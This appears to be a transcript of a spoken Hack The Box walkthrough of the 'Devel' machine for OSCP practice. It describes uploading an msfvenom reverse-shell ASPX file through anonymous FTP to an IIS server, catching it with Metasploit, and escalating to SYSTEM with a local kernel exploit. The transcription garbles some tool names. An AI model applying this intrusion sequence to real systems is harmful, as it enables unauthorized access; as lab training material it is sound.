All right, so we are on Devel. We have already done our mmap scan. We have port 80 and 21. From there, we went ahead and looked at port 21, and we see that it is talking to the web server. Because we got IS start, welcome.png, so it's talking to the web server. So from here, thought process is to go ahead and load in a ASP file, and we'll go from there. So we'll do that. Shell reverse TCP, right? Is that all? I mean, same exact concept, everything like that. Shell reverse TCP. Let me go ahead and get Metasploit opened up here. MSF console tech Q. Now remember, if you are taking the OSCP, since we're doing the TJ Knowles hack the box list for OSCP or whatever. If you are doing OSCP, you can use exploit multi-handler as much as you want. You can also use MSF Venom as much as you want. So to catch reverse shells, instead of trying to use Netcat every single time, you can use MSF. You can use exploit multi-handler. And a little trick in exploit multi-handler is you can look up what the different shells are called, which I have shown this one before, but let's go ahead and do a use exploit multi-handler. And we'll set a payload. You hit, we can say Windows. I just hit tab twice. That was stupid of me. You can see everything that we can make in here, right? So we'll say Windows. And then from here, you hit tab twice. Look at all 249 possibilities. Sure. Okay, we can make interpreter. All right. Shell reverse TCP. All right, and there we go. Shell reverse TCP. So we know we have it right over here. So we're actually going to set it as shell reverse TCP. Shell reverse TCP. All right, then from here, you can do a show options and see, okay, what does it actually need? Oh, it needs an L host and an L port. So we'll do our L host equals, and then our IP address, right, which I have to look at like real quick. 10.14.5. L port equals 4444. Tech F, it's going to be an ASP file, and we will call that shell.asp. We could try to enumerate through mmap, but if we do an mmap TAC P20, it's probably not going to be able to figure it out. TAC A, TAC O, we could try something like that. We could do a sudo mmap for 10.10.10.5, right? We're on? I think it is. 10.10.10.5. Could try to do this like right here. I don't know if it's going to be able to get it though, because only port 21 is up. Alright, so we got that right. Let's go ahead and let's get into port 21 now. OS service that's performed knows it's Windows. Let's see here. OS scan result, Windows Server 2008, it's thinking. Alright, let's go ahead and hop back into FTP. 10.10.10.5. Anonymous. And dir, we are, as far as I know, in the correct place. So let's go ahead and put shell.asp. Alright, cool. Let's go ahead and set our L host to ourselves. And we'll go ahead and run that. And let's try to go to 10.10.10.5 shell.asp and see if we get a callback. Oof. We did not. So it is in there. Let's try CD into ASP net client, since we can't look at that the other way. We have system web. Okay, maybe I was wrong about this. And there's nothing in there. Let's go try to put it in here. And we'll try to throw this at it. Even though ASP net client, we weren't technically allowed to get into, but we may be able to get, if we call for the full file, we may be able to get in like that. Nope. File directory not found. Oh, really now? Okay. Well then, now this just came up with a whole new thing, huh? Ah. So, we put it in there. Let's try in ASPX. we'll try to put that shell.aspx in there. Still everything's the same. Okay. There we go. All right, let's go. Let's go ahead and do a who am I? I am IIS app pool, dir, or web, www. CD back. Let's go ahead and do a search for shell 2. Use 0. Show options. Let's set our L host to ourselves, right? Set our session to 1. Go ahead and run that. All right, let's go ahead and hop back into shell. Doesn't look like you want to do that. Let's go ahead and hop back into sessions 1. So cd back. cd into users. Auto exec back. .bat. Wonder what that is. cd into Babis. Oh, can't do that. Okay. cd into administrator. Probably can't do that either. Okay. Huh. So now at least we're in. And I'm thinking we have to, let's go ahead and look up, search for suggester. Somebody keeps hopping all the way back over there. We'll go ahead and try to get the scaling a little bit smaller. Use 0. Show options, set session to 1. Let's go ahead and run that. We'll just do a what I did now. What do you mean? Oh, the vape? Taking drugs? No, I'm in the Marine Corps, remember? Been in for 18 years, dude. I'm not gonna be smoking pot the last 2 years. That's insane. I got 2 years till I retire. No, it's just a vape, that's all. I'm going to have to take like an extended break here. No suggestions available. Oh, okay. Let's try to call back to like an interpreter session and see if we can do anything with that. Should be interpreter reverse TCP, right? I already deleted it. Let's go ahead and use exploit multi-handler. Set our payload to Windows interpreter. Reverse TCP. Set our L host to myself. Set our L port to 4444. I want to run that. And we'll try to put shell.aspx back into there. Remember, I just deleted it. I just overwrote it over here. So we'll go ahead and we'll hop back into there. Boom. Oh, it doesn't seem to like that, huh? Is it too big? Maybe too big of a file. Okay, let's try to do it a stage payload then. Make it a little bit smaller. I'm going to run that. Delete shell.aspx. And we'll put shell.aspx. Okay, there we go. File's a little bit too big. Won't smoke pot, but we'll vape it. No, I will not. No. 2 years left. All right, let's go ahead and get UID up here. Okay. Now let's try for a search for a suggester. And use 0. Sessions tag I. We should have a session 2 now. Set session to 2. Let's run that. Now in 2 years, once I'm out. But no. Let that suggester run, see if we get anything back. I think we should. I mean, it's a Windows 8 system. So we should have plenty of exploits to run against it. Like, we should have 41. So, now sometimes this does freeze the exploit suggester, and it'll get stuck on usually 11, 12, 13, or 14, it'll be stuck on. I usually just stop it, restart it again, and it works. But if it's going to be stuck on 11, we already have one. We could try to run this exploit. Let's go ahead and use that guy right there. And we'll show options, and we will set our L host to myself. We should be able to set the session. Yep, set session to 2. Let's go ahead and run that. And let's see if that works. If that doesn't work, we have to go back to suggester. All right, so we have to go back to suggester. You gotta run it again, and then this time it shouldn't get stuck. That happens a lot, actually, where it just gets stuck all of a sudden. A little bit annoying, but it'll be okay. Oh, it's almost done. Oh. See how I just got right through that one that time? Like I said, that happens a lot. Yeah, told you, we should have plenty of exploits to be able to use against this guy. Go ahead, we're just going to start working our way down the list. Hopefully we don't break the box. Because some of these will break a system, so if we don't break it, let's go ahead and use this guy. All right, MS05, show options, set L host to myself, right? And we'll go ahead and we will set the session to 2. We'll run that. Looks like this guy's going to work. Yeah, this guy's looking like he's going to work. And we're in, get UID, and we are NT Authority System. Let's go ahead and get a shell. CD into C Windows. I will say one thing though, Hack the Box, their Windows, once you get into the shell, it is freaking fast. CD into users, CD into Babis, CD into desktop. And I do like how they keep putting the user files in the same spot that you're supposed to. Except for one box so far. One of them was, they had a couple user files. It was weird. One of them, a couple user.txt files. We had to figure out which one to use. I'll say that's a 3 for difficulty. Because we didn't know to upload a shell, I mean, obviously once you got into FTP, you realize, oh, that's connected there. You can always go from there. So CD back, CD back, dir, CD into administrator, CD into desktop, and we'll go ahead and we'll type out that root.txt. And there we go. So we are all done with that guy. And these are the OSCP boxes, huh? Okay. I'm going to terminate him. And we'll hop into the next one that we're going to be doing. I don't have my cherry tree open anymore. And I don't think I saved the OSCP boxes there, did I? Open file. No, I want my recent files. Recent documents. I had one that was called Notes. and it was in just the regular directory. Let me go and open file, desktop, notes, hacking notes. Hopefully they all saved. Yep, TJ Notebox. All right, cool. Good thing I always hit Control S out every single time. So we've done Legacy, Blue, Devel. We did Blue yesterday. If you guys really want to see it, we can do it again. I didn't know it was going to be on this list. Next one is Optimum. And then after Optimum, we'll go ahead and we'll take a break. Take a quick